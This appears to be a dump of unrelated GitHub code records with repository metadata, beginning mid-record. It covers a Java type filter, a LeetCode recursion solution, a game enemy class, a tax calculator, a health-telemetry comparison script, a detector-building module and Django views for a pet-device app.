\tNone),\n\t\"int16_t\":\tPrimitive(\"int16_t\", \t\"int\",\t\t\"Int16\",\t2,\t\"short\",\t\"Integer\",\t\"Short\",None),\n\t\"int32_t\":\tPrimitive(\"int32_t\", \t\"int\",\t\t\"Int32\",\t4,\t\"int\", \t\t\"Integer\",\t\"Int\",\tNone),\n\t\"uint8_t\":\tPrimitive(\"uint8_t\", \t\"int\",\t\t\"Uint8\",\t1,\t\"byte\",\t\t\"Integer\",\t\"\",\t\t\"0xFF\"),\n\t\"uint16_t\":\tPrimitive(\"uint16_t\", \t\"int\",\t\t\"Uint16\",\t2,\t\"short\",\t\"Integer\",\t\"Short\",\"0xFFFF\"),\n\t\"uint32_t\":\tPrimitive(\"uint32_t\", \t\"long\",\t\t\"Uint32\",\t4,\t\"int\",\t\t\"Long\",\t\t\"Int\",\t\"0xFFFFFFFFl\"),\n\t\"float\": \tPrimitive(\"float\", \t\t\"float\",\t\"Float\",\t4,\t\"float\",\t\"Float\",\t\"Float\",None),\n\t\"char\":\t\tPrimitive(\"char\", \t\t\"char\",\t\t\"Char\",\t\t1,\t\"byte\",\t\t\"Character\",\t\t\"\",\t\tNone),\n\t\"Bool\":\t\tPrimitive(\"Bool\",\t\t\"boolean\",\t\"Bool\", \t1,\t\"boolean\",\t\"Boolean\",\t\"\",\t\tNone),\n}\n\n# -----------------------------------------------------------------------------\ndef typeJavaObjectName(name):\n\tif name in PRIMITIVES:\n\t\treturn PRIMITIVES[name].javaWrapper\n\telse:\n\t\treturn name.title().replace(' ', '')\n\ndef typeName(name):\n\tif name in PRIMITIVES:\n\t\treturn PRIMITIVES[name].javaType\n\telse:\n\t\treturn name.title().replace(' ', '')\n\ndef typeObjectName(name):\n\tif name in PRIMITIVES:\n\t\treturn PRIMITIVES[name].name\n\telse:\n\t\treturn name.title().replace(' ', '')\n\ndef variableName(name):\n\tname = name.title().replace(' ', '')\n\tname = name[0].lower() + name[1:]\n\treturn name\n\ndef enumElement(name):\n\treturn name.upper().replace(' ', '_')\n\ndef inStringDescription(description):\n\treturn \"\\\\n\".join(description.replace('\"', '\\\\\"').splitlines());\n","repo_name":"modm-io/modm","sub_path":"tools/xpcc_generator/builder/filter/java.py","file_name":"java.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","stars":657,"dataset":"github-code","pt":"45"} +{"seq_id":"24835087194","text":"#\n# @lc app=leetcode id=779 lang=python3\n#\n# [779] 
K-th Symbol in Grammar\n#\n# https://leetcode.com/problems/k-th-symbol-in-grammar/description/\n#\n# algorithms\n# Medium (38.36%)\n# Likes: 707\n# Dislikes: 178\n# Total Accepted: 44.7K\n# Total Submissions: 116.4K\n# Testcase Example: '1\\n1'\n#\n# On the first row, we write a 0. Now in every subsequent row, we look at the\n# previous row and replace each occurrence of 0 with 01, and each occurrence of\n# 1 with 10.\n# \n# Given row N and index K, return the K-th indexed symbol in row N. (The values\n# of K are 1-indexed.) (1 indexed).\n# \n# \n# Examples:\n# Input: N = 1, K = 1\n# Output: 0\n# \n# Input: N = 2, K = 1\n# Output: 0\n# \n# Input: N = 2, K = 2\n# Output: 1\n# \n# Input: N = 4, K = 5\n# Output: 1\n# \n# Explanation:\n# row 1: 0\n# row 2: 01\n# row 3: 0110\n# row 4: 01101001\n# \n# \n# Note:\n# \n# \n# N will be an integer in the range [1, 30].\n# K will be an integer in the range [1, 2^(N-1)].\n# \n# \n#\n\n# @lc code=start\nclass Solution:\n def kthGrammar(self, N: int, K: int) -> int:\n\n # edge case\n if N == 1:\n return 0\n \n # the location of corresponding K in the previous row\n prevK = (K + 1) // 2\n\n # the value of corresponding K in the previous row\n prevV = self.kthGrammar(N-1, prevK)\n\n # get the current value from previous value (i.e. recursion relation)\n return prevV ^ ((K-1) % 2)\n# @lc code=end\n\n","repo_name":"fufuleetcode/FufuLeetCode","sub_path":"779.k-th-symbol-in-grammar.py","file_name":"779.k-th-symbol-in-grammar.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"8115478358","text":"from Personnage import *\nfrom Level import *\nclass Enemy(Personnage) :\n def __init__(self, level, x, y, nom=\"Enemy\",):\n l = Level(level)\n Personnage.__init__(self, nom, l.maxHp - 50, l, level*30, 0, 0, level*7, x, y)\n\n def movesToPlayer(self, player, r):\n flag = False\n if player.abs > self.abs :\n flag = self.action('r', r)\n if not flag :\n if player.abs < self.abs :\n flag = self.action('l', r)\n if not flag :\n if player.ord > self.ord :\n flag = self.action('u', r)\n if not flag :\n if player.ord < self.ord :\n flag = self.action('d', r)\n\n def checkDead(self):\n if self.hp <= 0:\n return True\n return False\n","repo_name":"Rotschadel/ft_minirogue","sub_path":"Enemy.py","file_name":"Enemy.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"21158432859","text":"import argparse\nclass OrderCalculator:\n def __init__(self, quantity, price, state):\n self.quantity = quantity\n self.price = price\n self.state = state\n self.tax_rates = {\n \"CA\": 0.0825,\n \"TX\": 0.0625,\n \"UT\": 0.0685,\n \"NV\": 0.08,\n \"AL\": 0.04,\n }\n\n\n def get_price(self):\n \"\"\"Get price for Order.\"\"\"\n return round(self.price * self.quantity * (1 + self.get_tax_rate()), 2)\n\n def get_tax_rate(self):\n return self.tax_rates[self.state]\n\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-q', '--quantity', type=int)\n parser.add_argument('-p', '--price', type=int)\n parser.add_argument('-s', '--state', type=str)\n args = parser.parse_args()\n calculator = OrderCalculator(quantity=args.quantity, price=args.price, state=args.state)\n order_value = calculator.get_price()\n print(order_value)\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"yanxuzheng/vertical_slicing_workshop","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"21702482599","text":"# Analyzer to clean up Telemetry data and compare it to the Dozee and EarlySense devices\r\n\r\nimport csv\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\ndef clean(filename, new_filename):\r\n \"\"\"Arguments: \r\n filename: original data file\r\n new_filename: name of new file to write to\r\n \r\n Returns: the new file that contains only the columns \r\n that we wanted from the original file\r\n \"\"\"\r\n\r\n data = pd.read_csv(filename) # make file usable in python\r\n headers = data.columns\r\n tele = \"TELEMETRY\"\r\n dozee = \"DOZEE\"\r\n es = \"ES\"\r\n new_file = new_filename # create new file to write to\r\n with open(new_file, 'w', newline=\"\") as file: # write to new file\r\n csvwriter = csv.writer(file)\r\n for header in headers:\r\n if tele in filename: # if the file is telemetry\r\n headers = [\"Time\", \"ECG_HR\", \"CO2_RR\"]\r\n csvwriter.writerow(headers) # write the headers to the file\r\n if (header == \"Time\" or header == \"ECG_HR\" or header == \"CO2_RR\"):\r\n csvwriter.writerows(data.header) # write the data for headers we wanted\r\n elif dozee in filename: # if the file is Dozee\r\n headers = [\"Time\", \"Heart Rate\", \"Breath Rate\"]\r\n csvwriter.writerow(headers)\r\n if (header == \"Time\" or header == \"Heart Rate\" or header == \"Breath Rate\"):\r\n csvwriter.writerows(data.header)\r\n elif es in filename: # if the file is EarlySense\r\n headers = [\"Clock\", \"Hr avg\", \"Rr avg\"]\r\n csvwriter.writerow(headers)\r\n if (header == \"Clock\" or header == \"Hr avg\" or header == \"Rr avg\"):\r\n csvwriter.writerows(data.header)\r\n return new_file\r\n\r\n\r\ndef colon_split(string):\r\n \"\"\"Cleans the time format to include only hours and minutes\r\n \r\n Arguments: \r\n string: the time as a string\r\n \r\n Returns: a string representing the time with only hours and minutes\r\n \"\"\"\r\n\r\n if string.count(\":\") == 1: # if there is only one colon, return the same string\r\n return string\r\n # string.split(\":\")[0]\r\n return \":\".join(string.split(\":\", 2)[:2]) # return everything before the second colon (HR:MM:SS -> HR:MM)\r\n\r\n\r\ndef clean_tele(new_filename):\r\n \"\"\"Averages the heart rate and respiratory rate for each minute\r\n for the telemetry data and rewrites it to the file\r\n \r\n Arguments: \r\n new_filename: the new file with only the heart rate and respiratory\r\n rate columns that we cleaned using clean() \r\n \r\n Returns: the new, rewritten telemetry file with the averages for\r\n each minute instead of data points for every 5 seconds\r\n \"\"\"\r\n\r\n data = pd.read_csv(new_filename)\r\n time = data.Time.split(\" \")[1] # separate the date from the time\r\n hr = data.ECG_HR\r\n rr = data.CO2_RR\r\n total_hr = 0\r\n total_rr = 0\r\n count = 0\r\n averages = []\r\n for i in range(1, len(time)):\r\n j = colon_split(time[i]) # take the seconds out of the time\r\n k = colon_split(time[i - 1])\r\n if j == k: # if the min is the same as the next min, add the values and increase count\r\n total_hr += hr[i]\r\n total_rr += rr[i]\r\n count += 1\r\n averages.append([(total_hr / count), (total_rr / count)]) # append the averages for each min in a new list\r\n \r\n new_file = new_filename # rewrite the file\r\n with open(new_file, 'w', newline=\"\") as 
\r\n\r\ndef clean_tele(new_filename):\r\n    \"\"\"Averages the heart rate and respiratory rate for each minute\r\n    for the telemetry data and rewrites it to the file\r\n    \r\n    Arguments: \r\n    new_filename: the new file with only the heart rate and respiratory\r\n    rate columns that we cleaned using clean() \r\n    \r\n    Returns: the new, rewritten telemetry file with the averages for\r\n    each minute instead of data points for every 5 seconds\r\n    \"\"\"\r\n\r\n    data = pd.read_csv(new_filename)\r\n    time = data.Time.str.split(\" \").str[1] # separate the date from the time\r\n    hr = data.ECG_HR\r\n    rr = data.CO2_RR\r\n    total_hr = 0\r\n    total_rr = 0\r\n    count = 0\r\n    averages = []\r\n    for i in range(1, len(time)):\r\n        j = colon_split(time[i]) # take the seconds out of the time\r\n        k = colon_split(time[i - 1])\r\n        if j == k: # if the min is the same as the previous min, add the values and increase count\r\n            total_hr += hr[i]\r\n            total_rr += rr[i]\r\n            count += 1\r\n        elif count: # a new minute started, so store the averages for the finished minute\r\n            averages.append([k, total_hr / count, total_rr / count])\r\n            total_hr = 0\r\n            total_rr = 0\r\n            count = 0\r\n    if count: # store the averages for the last minute\r\n        averages.append([colon_split(time[len(time) - 1]), total_hr / count, total_rr / count])\r\n    \r\n    new_file = new_filename # rewrite the file\r\n    with open(new_file, 'w', newline=\"\") as file:\r\n        csvwriter = csv.writer(file) \r\n        csvwriter.writerow(data.columns)\r\n        csvwriter.writerows(averages)\r\n    return new_file\r\n    \r\n\r\ndef timepoints(filename):\r\n    \"\"\"Takes a file of cleaned data and counts how many evaluable minutes of \r\n    data are in the file.\r\n    \r\n    Arguments:\r\n    filename: file with cleaned data\r\n    \r\n    Returns: an int representing the number of evaluable minutes in the file \r\n    \"\"\"\r\n\r\n    points = 0\r\n    data = pd.read_csv(filename)\r\n    headers = data.columns\r\n    for i in range(len(data)):\r\n        # a minute is evaluable when both readings are present and non-zero\r\n        if not (data[headers[1]][i] == 0 or pd.isnull(data[headers[1]][i]) or \r\n                data[headers[2]][i] == 0 or pd.isnull(data[headers[2]][i])): \r\n            points += 1\r\n    return points\r\n\r\n\r\ndef plot(tele, es, dozee):\r\n    \"\"\"Takes the cleaned data files for the Telemetry, EarlySense, and Dozee\r\n    and creates two line graphs to compare values for each minute\r\n    \r\n    Arguments:\r\n    tele: cleaned Telemetry data\r\n    es: cleaned EarlySense data\r\n    Dozee: cleaned Dozee data\r\n    \r\n    Returns: two color-coordinated line graphs that represents the data points\r\n    for each minute for each of the data sets (heart rate and respiratory rate)\r\n    \"\"\"\r\n    tele_rows = []\r\n    with open(tele, 'r') as file:\r\n        csvreader = csv.reader(file)\r\n        tele_header = next(csvreader)\r\n        for row in csvreader:\r\n            tele_rows.append(row)\r\n    \r\n    es_rows = []\r\n    with open(es, 'r') as file:\r\n        csvreader = csv.reader(file)\r\n        es_header = next(csvreader)\r\n        for row in csvreader:\r\n            es_rows.append(row)\r\n\r\n    dozee_rows = []\r\n    with open(dozee, 'r') as file:\r\n        csvreader = csv.reader(file)\r\n        dozee_header = next(csvreader)\r\n        for row in csvreader:\r\n            dozee_rows.append(row)\r\n\r\n    tele_hr_x = []\r\n    tele_hr_y = []\r\n    for row in tele_rows:\r\n        tele_hr_x.append(row[0])\r\n        tele_hr_y.append(row[1])\r\n    plt.plot(tele_hr_x, tele_hr_y, label = \"Telemetry Heart Rate\")\r\n\r\n    es_hr_x = []\r\n    es_hr_y = []\r\n    for row in es_rows:\r\n        es_hr_x.append(row[0])\r\n        es_hr_y.append(row[1])\r\n    plt.plot(es_hr_x, es_hr_y, label = \"EarlySense Heart Rate\")\r\n\r\n    dozee_hr_x = []\r\n    dozee_hr_y = []\r\n    for row in dozee_rows:\r\n        dozee_hr_x.append(row[0])\r\n        dozee_hr_y.append(row[1])\r\n    plt.plot(dozee_hr_x, dozee_hr_y, label = \"Dozee Heart Rate\")\r\n\r\n    plt.xlabel(\"Time (HH:MM)\")\r\n    plt.ylabel(\"Heart Rate\")\r\n    plt.title(\"Heart Rate Comparison\")\r\n    plt.legend()\r\n    plt.show()\r\n\r\n    tele_rr_x = []\r\n    tele_rr_y = []\r\n    for row in tele_rows:\r\n        tele_rr_x.append(row[0])\r\n        tele_rr_y.append(row[2])\r\n    plt.plot(tele_rr_x, tele_rr_y, label = \"Telemetry Respiratory Rate\")\r\n\r\n    es_rr_x = []\r\n    es_rr_y = []\r\n    for row in es_rows:\r\n        es_rr_x.append(row[0])\r\n        es_rr_y.append(row[2])\r\n    plt.plot(es_rr_x, es_rr_y, label = \"EarlySense Respiratory Rate\")\r\n\r\n    dozee_rr_x = []\r\n    dozee_rr_y = []\r\n    for row in dozee_rows:\r\n        dozee_rr_x.append(row[0])\r\n        dozee_rr_y.append(row[2])\r\n    plt.plot(dozee_rr_x, dozee_rr_y, label = \"Dozee Respiratory Rate\")\r\n\r\n    plt.xlabel(\"Time (HH:MM)\")\r\n    plt.ylabel(\"Respiratory Rate\")\r\n    plt.title(\"Respiratory Rate Comparison\")\r\n    plt.legend()\r\n    plt.show()\r\n\r\n    \r\ndef main():\r\n    \"\"\"\"\"\"\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()","repo_name":"avchin/telemetry-data-cleaner","sub_path":"dozee_analyzer.py","file_name":"dozee_analyzer.py","file_ext":"py","file_size_in_byte":6918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"37932576224","text":"import os\nimport torch\nimport numpy 
as np\nimport lightning.pytorch as pl\n\nfrom .modules.yolo import build_yolov\nfrom .modules.fasterrcnn import build_faster_rcnn\nfrom .modules.ssd import build_ssd\nfrom .modules.detr import build_detr\nfrom .mmoptimizer import build_optimizer\n\nSUPPORTED_DETECTORS = [\"yolov8\", \"yolov5\", \"yolov3\", \"fasterrcnn\", \"ssd\", \"detr\"]\nSUPPORTED_TRACKERS = [\"sort\", \"deepsort\", \"bytetrack\"]\n\nPRETRAIN_WEIGHT_DICT = {\"yolov8\": {\"n\": \"./mm/weights/yolov8n.pt\",\n                                   \"s\": \"./mm/weights/yolov8s.pt\",\n                                   \"m\": \"./mm/weights/yolov8m.pt\",\n                                   \"l\": \"./mm/weights/yolov8l.pt\",\n                                   \"x\": \"./mm/weights/yolov8x.pt\"},\n                        \"yolov5\": {\"n\": \"./mm/weights/yolov5nu.pt\",\n                                   \"s\": \"./mm/weights/yolov5su.pt\",\n                                   \"m\": \"./mm/weights/yolov5mu.pt\",\n                                   \"l\": \"./mm/weights/yolov5lu.pt\",\n                                   \"x\": \"./mm/weights/yolov5xu.pt\"},\n                        \"yolov3\": {\"x\": \"./mm/weights/yolov3u.pt\"},\n                        \"fasterrcnn\": {\"s\": \"./mm/weights/fasterrcnn_s.pth\",\n                                       \"m\": \"./mm/weights/fasterrcnn_m.pth\",\n                                       \"l\": \"./mm/weights/fasterrcnn_l.pth\"},\n                        \"ssd\": {\"s\": \"./mm/weights/ssd_s.pth\",\n                                \"m\": \"./mm/weights/ssd_m.pth\",\n                                \"l\": \"./mm/weights/ssd_l.pth\"},\n                        \"detr\": {\"m\": \"./mm/weights/detr_m.pth\"}}\n\nclass MMNetwork(pl.LightningModule):\n    def __init__(self, *args, **kwargs):\n        super().__init__()\n        self.model = kwargs[\"model\"]\n        self.model_type = kwargs[\"model_type\"]\n        self.model_name = kwargs[\"model_name\"]\n        self.model_size = kwargs[\"model_size\"]\n        self.model_weight_path = kwargs[\"model_weight_path\"]\n        \n        # Inference\n        self.preprocess = kwargs.get(\"preprocess\", lambda x: x)\n        self.postprocess = kwargs.get(\"postprocess\", lambda x: x)\n        \n        # Training\n        self.preprocess_batch = kwargs.get(\"preprocess_batch\", lambda x: x)\n        self.loss_function = kwargs.get(\"loss_function\", lambda x: x)\n        \n        self.args = kwargs[\"args\"]\n        \n    @torch.no_grad()\n    def predict_step(self, im0s):\n        self.model.eval()\n        if \"yolo\" in self.model_name:\n            if not isinstance(im0s, torch.Tensor): ims = self.preprocess(self, \n                                                                         orig_imgs=im0s)\n            else: ims = im0s\n            preds = self.model(ims)\n            results = self.postprocess(self, preds=preds,\n                                       img=ims, orig_imgs=im0s)\n        elif any(name in self.model_name for name in (\"fasterrcnn\", \"ssd\", \"detr\")): # a bare or-chain is always truthy, so test each name\n            preds = []\n            for im0 in im0s:\n                im = self.preprocess(self, orig_imgs=im0)\n                pred = self.model.test_step(im)[0]\n                preds.append(pred)\n            results = self.postprocess(self, preds=preds, \n                                       orig_imgs=im0s)\n        return results\n    \n    def training_step(self, batch, batch_idx):\n        self.model.train()\n        batch = self.preprocess_batch(self, batch=batch)\n        loss = self.loss_function(self, batch=batch)\n        return loss\n    \n    def configure_optimizers(self):\n        optimizer = build_optimizer(self.model, self.args['optimizer'],\n                                    self.args['lr'], self.args['momentum'], \n                                    self.args['weight_decay'])\n        return optimizer\n    \n    @property\n    def device(self):\n        device = next(self.parameters()).device\n        return device\n
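\n# Usage sketch (illustrative only; assumes the pretrained weight files listed above exist):\n#   net = build_network(\"yolov8_s\")            # name yolov8, size s -> detect model\n#   results = net.predict_step(list_of_frames)\n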
\ndef build_detector(model_name, model_size, model_weight_path):\n    current_file = os.path.realpath(__file__)\n    current_directory = os.path.dirname(current_file)\n    \n    if model_weight_path is None and model_name in PRETRAIN_WEIGHT_DICT and model_size in PRETRAIN_WEIGHT_DICT[model_name]:\n        model_weight_path = PRETRAIN_WEIGHT_DICT[model_name][model_size]\n    \n    print(f\"Building {model_weight_path} model...\")\n    if \"yolo\" in model_name: detector, \\\n        preprocess, postprocess, \\\n        preprocess_batch, loss_function = build_yolov(current_directory,\n                                                      model_name, model_size,\n                                                      model_weight_path)\n    elif \"fast\" in model_name: detector, \\\n        preprocess, postprocess, \\\n        preprocess_batch, loss_function = build_faster_rcnn(current_directory,\n                                                            model_name, model_size,\n                                                            model_weight_path)\n    elif \"ssd\" in model_name: detector, \\\n        preprocess, postprocess, \\\n        preprocess_batch, loss_function = build_ssd(current_directory,\n                                                    model_name, model_size,\n                                                    model_weight_path)\n    elif \"detr\" in model_name: detector, \\\n        preprocess, postprocess, \\\n        preprocess_batch, loss_function = build_detr(current_directory,\n                                                     model_name, model_size,\n                                                     model_weight_path)\n    \n    model_info = {\n        \"model\": detector,\n        \"model_type\": \"detect\",\n        \"model_name\": model_name,\n        \"model_size\": model_size,\n        \"model_weight_path\": model_weight_path,\n        \"args\" : {\"half\": False,\n                  \"conf\": 0.75,\n                  \"iou\": 0.45,\n                  \"imgsz\": 640,\n                  \"epochs\": 2,\n                  \"batch\": 2,\n                  \"workers\": 4,\n                  \"shuffle\": True,\n                  \"optimizer\": \"SGD\",\n                  \"lr\": 0.0001,\n                  \"momentum\": 0.8,\n                  \"weight_decay\": 0.0005},\n        \"preprocess\": preprocess,\n        \"postprocess\": postprocess,\n        \"preprocess_batch\": preprocess_batch,\n        \"loss_function\": loss_function,\n        \"optimizer_name\": \"Adam\"\n    }\n    \n    network = MMNetwork(**model_info)\n    \n    return network\n\ndef build_detector_trainer():\n    pass\n\ndef build_tracker(model_name, model_size, model_weight_path=None):\n    # stub; accepts the same arguments build_network passes to build_detector\n    pass\n\ndef build_network(model_cls,\n                  model_weight_path=None):\n    model_cls = model_cls.lower().split(\"_\")\n    model_type = None\n    if len(model_cls) == 3: model_name, model_size, model_type = model_cls\n    else: (model_name, model_size), model_type = model_cls, \"detect\" if model_cls[0] in SUPPORTED_DETECTORS else \"track\"\n\n    assert model_name in SUPPORTED_DETECTORS + SUPPORTED_TRACKERS, f\"Unsupported model name: {model_name}\"\n    assert model_type in [\"detect\", \"track\"], f\"Unsupported model type: {model_type}\"\n    \n    if model_type == \"detect\":\n        model = build_detector(model_name, model_size, model_weight_path)\n    elif model_type == \"track\":\n        model = build_tracker(model_name, model_size, model_weight_path)\n    \n    return model","repo_name":"dovedb/DoveDB_MVP","sub_path":"src/mm/mmnetwork.py","file_name":"mmnetwork.py","file_ext":"py","file_size_in_byte":7547,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"45"} +{"seq_id":"13318191067","text":"from django.shortcuts import render\nimport json\nimport traceback\nfrom .models import MachineDetails, User, Pets, petDefaultImage\nfrom django.core.exceptions import *\nfrom rest_framework.views import APIView\nfrom django.db import IntegrityError\nfrom brilliantPet.generalMethods import *\nfrom brilliantPet import settings\nimport boto3\nimport base64\nimport time\nfrom .userFunctions import *\nfrom .eventFunctions import *\nfrom .machineFunctions import *\nfrom .timerFunctions import *\n\nfrom django.core import serializers\nimport django.http\n\n\n\ngm = generalClass()\n\nclass notFound(APIView):\n\n    def get(self, request):\n        message = \"Service not found.\"\n        return gm.clientError(message)\n\n\n\nclass userDevices(APIView):\n\n    def get(self, request):\n\n        machines = []\n        params = request.query_params\n\n        hasError = hasErrorAuthenticate(params)\n        if hasError:\n            return hasError\n\n        else:\n            user = getUser(params)\n            if user.user_type.lower() in [\"admin\", \"customer_support\"]:\n                userMachines = MachineDetails.objects.filter(isremoved = 0)\n            else:\n                userMachines = MachineDetails.objects.filter(userid = params[\"userid\"], isremoved = 0)\n            for m in userMachines:\n                machine = {\n                    \"machine_id\" : m.machine_id,\n                    \"mode\" : m.mode,\n                    \"name\" : 
m.name,\n \"status\" : m.status,\n \"userid\" : m.userid_id,\n \"machine_size\":m.machine_size,\n \"roll_length\":m.roll_length,\n \"firmware\":m.firmware,\n \"network\":m.network\n \n\n }\n machines.append(machine)\n\n return gm.successResponse(machines)\n\n\n def post(self, request):\n\n data = request.data\n\n hasError = hasErrorAuthenticate(data)\n if hasError:\n return hasError\n\n requiredParams = [\"machine_id\", \"name\", \"status\", \"mode\", \"firmware\", \"network\", \"user_role\"]\n\n missingParams = gm.missingParams(requiredParams, data)\n if missingParams:\n missingParams = \", \".join(missingParams)\n return gm.clientError(missingParamMessage.format(missingParams))\n\n emptyParams = gm.emptyParams(requiredParams, data)\n if emptyParams:\n emptyParams = \", \".join(emptyParams)\n return gm.clientError(emptyParamMessage.format(emptyParams))\n\n # try:\n # MachineDetails.objects.get(pk = data[\"machine_id\"], isremoved = 0)\n # return gm.clientError(\"machine_id exists. Please provide a unique machine_id\")\n # except:\n machineid = data[\"machine_id\"].strip()\n userid = data[\"userid\"].strip()\n name = data[\"name\"].strip()\n status = int(data[\"status\"].strip())\n\n defaultParams = {\n \"mode\" : \"manual\",\n \"firmware\" : \"\",\n \"network\" : \"\",\n \"isremoved\" : 0,\n \"user_role\" : \"owner\",\n \"machine_size\":\"standard\",\n \"roll_length\":\"standard\",\n }\n\n for default in defaultParams.keys():\n if default in data:\n defaultParams[default] = data[default]\n\n mode = defaultParams[\"mode\"]\n firmware = defaultParams[\"firmware\"]\n network = defaultParams[\"network\"]\n isRemoved = defaultParams[\"isremoved\"]\n user_role = defaultParams['user_role']\n machine_size =defaultParams['machine_size']\n roll_length=defaultParams['roll_length']\n\n if machine_size == None or validateMachineSize(machine_size)==False:\n machine_size=\"standard\"\n\n if roll_length == None or validateRollLength(roll_length)==False:\n roll_length=\"standard\"\n\n\n user = getUser(data)\n\n try:\n\n user.machinedetails_set.create(machine_id = machineid, name = name, status = status, \\\n mode = mode, firmware = firmware, network = network, isremoved = isRemoved,\\\n user_role = user_role)\n\n except IntegrityError as e:\n machine = MachineDetails.objects.get(pk = data[\"machine_id\"])\n machine.machine_id = machineid\n machine.name = name\n machine.userid = user\n machine.status = status\n machine.mode = mode\n machine.firmware = firmware\n machine.network = network\n machine.isremoved = isRemoved\n machine.user_role = user_role\n\n if machine_size != None and validateMachineSize(machine_size):\n machine.machine_size=machine_size.lower()\n\n\n if roll_length != None and validateRollLength(roll_length):\n machine.roll_length=roll_length.lower()\n\n machine.save()\n\n # serialized_obj = serializers.serialize('json', [ machine, ])\n # return gm.successResponse(serialized_obj)\n m=machine\n machineres = {\n \"machine_id\" : m.machine_id,\n \"mode\" : m.mode,\n \"name\" : m.name,\n \"status\" : m.status,\n \"userid\" : m.userid_id,\n \"machine_size\":m.machine_size,\n \"roll_length\":m.roll_length,\n \"firmware\":m.firmware,\n \"network\":m.network\n }\n return gm.successResponse(machineres)\n\n\n\n except Exception as e:\n traceback.print_exc()\n gm.errorLog(traceback.format_exc())\n return gm.errorResponse(\"Error while saving device details.\")\n\n else:\n return gm.successResponse(data)\n\n\n\n def delete(self, request):\n\n data = gm.cleanData(request.data)\n\n hasError = 
hasErrorAuthenticate(data)\n        if hasError:\n            return hasError\n\n        requiredParams = [\"machine_id\"]\n        emptyOrMissing = gm.getMissingEmptyParams(requiredParams, data)\n\n        if emptyOrMissing:\n            return emptyOrMissing\n        try:\n            machine = MachineDetails.objects.get(machine_id = data[\"machine_id\"])\n            machine.isremoved = 1\n            machine.save()\n            return gm.successResponse(\"Successfully deleted machine : {}\".format(machine.machine_id))\n\n        except:\n            error = traceback.format_exc()\n            print(error)\n            gm.errorLog(error)\n            return gm.errorResponse(\"There was a problem while deleting the machine.\")\n\n\n\n\nclass usersView(APIView):\n    bucketName = \"brilliantpet.user-images\"\n\n    def get(self, request):\n        params = request.query_params\n        gm.log(params)\n\n        hasError = hasErrorAuthenticate(params)\n        if hasError:\n            return hasError\n\n        user = getUser(params)\n\n        data = {\n            \"email\" : user.email,\n            \"name\" : user.name,\n            \"address\" : user.address,\n            \"rolls_count_at_home\" : user.rolls_count_at_home,\n            \"userid\" : user.userid,\n            \"profile_image\" : user.profile_image,\n        }\n        return gm.successResponse(data)\n\n    def post(self, request):\n        data = request.data\n        requiredParams = [\"userid\", \"name\", \"notification_token\", \"rolls_count_at_home\", \"password\", \"email\", \"address\", \"shopify_access_token\"]\n        data = gm.cleanData(data)\n        data[\"profile_image\"] = \"\"\n\n        if data.get(\"notification_token\") in [\"\", \" \", None, False]: # .get avoids a KeyError before the missing-param check below\n            data[\"notification_token\"] = \"default_Notification_token\"\n\n        missingParams = gm.missingParams(requiredParams, data)\n        if missingParams:\n            missingParams = \", \".join(missingParams)\n            return gm.clientError(missingParamMessage.format(missingParams))\n\n        emptyParams = gm.emptyParams(requiredParams, data)\n        if emptyParams:\n            emptyParams = \", \".join(emptyParams)\n            return gm.clientError(emptyParamMessage.format(emptyParams))\n\n        if \"rolls_count_at_home\" in data:\n            try:\n                int(data[\"rolls_count_at_home\"])\n            except:\n                return gm.clientError(\"rolls_count_at_home should be int.\")\n\n\n\n\n        #uploading profile Image\n\n        imageHandler = request.FILES.get(\"profile_image\")\n        if imageHandler:\n            extension = gm.getFileExtension(imageHandler.name)\n            fileName = gm.getUniqueFileName(extension)\n            image = imageHandler.read()\n            mimetype = \"image/jpeg\"\n\n            downloadUrl = gm.uploadToS3(self.bucketName, fileName, image, mimetype)\n\n            if downloadUrl:\n                data[\"profile_image\"] = downloadUrl #setting profile image if upload success\n\n        # default profile image if upload failed\n\n        user = isUser(data)\n\n        try:\n            user = register(data, user)\n            token = login(data, user)\n            details = {\n                \"userid\" : user.userid,\n                \"name\" : user.name,\n                \"notification_token\" : user.notificationToken,\n                \"rolls_count_at_home\" : user.rolls_count_at_home,\n                \"email\" : user.email,\n                \"address\" : user.address,\n                \"profile_image\" : user.profile_image,\n                \"shopify_access_token\" : user.shopify_access_token,\n                \"login_token\" : token\n            }\n            return gm.successResponse(details)\n\n        except ValidationError as e:\n            return gm.errorResponse(str(e))\n\n        except:\n            gm.errorLog(\"Data : {}\nError : {}\".format(data, traceback.format_exc()))\n\n            return gm.errorResponse(\"Error while adding user.\")\n\n\n
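\n# Request sketch (illustrative; the exact route path for the view below lives in the url config):\n#   requests.post(upload_url, data={\"userid\": \"...\", \"login_token\": \"...\"},\n#                 files={\"image_file\": open(\"photo.jpg\", \"rb\")})\n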
in form-data.\")\n\n data = request.data\n\n hasError = hasErrorAuthenticate(data)\n if hasError:\n return hasError\n\n userid = getUser(data).userid\n imgtype = gm.getFileExtension(imageHandler.name)\n fileName = \"{}_{}\".format(userid, gm.getUniqueFileName(imgtype))\n mimetype = \"image/jpeg\"\n image = imageHandler.read()\n\n download_url = gm.uploadToS3(self.bucketName, fileName, image, mimetype)\n\n if download_url:\n gm.log(\"Image received : {}\".format(image) + \"\\nUrl generated : \" + download_url)\n return gm.successResponse(download_url)\n\n else:\n return gm.clientError(\"Error while uploading file.\")\n\n\n\nclass userLogin(APIView):\n\n def get(self, request):\n return gm.clientError(\"GET Method is not supported.\")\n\n def post(self, request):\n data = request.data\n\n missingLoginDetails = gm.login_details_absent(data)\n if not missingLoginDetails:\n return missingLoginDetails\n\n if \"password\" not in data:\n return gm.clientError(\"Required param 'password' missing.\")\n\n user = isUser(data)\n\n if not user:\n return gm.not_a_user()\n\n token = login(data, user)\n\n if token:\n loginToken = {\n \"login_token\" : token\n }\n return gm.successResponse(loginToken)\n\n else:\n return 